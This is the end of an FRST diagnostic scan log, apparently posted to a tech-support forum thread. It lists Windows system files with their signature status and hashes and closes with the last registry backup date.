    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll
    [2015-01-23 12:05] - [2015-01-23 12:05] - 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12

    C:\WINDOWS\SysWOW64\dnsapi.dll
    [2015-01-23 12:05] - [2015-01-23 12:05] - 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59

    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-01-03 06:38

    ==================== End of FRST.txt ============================
     

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...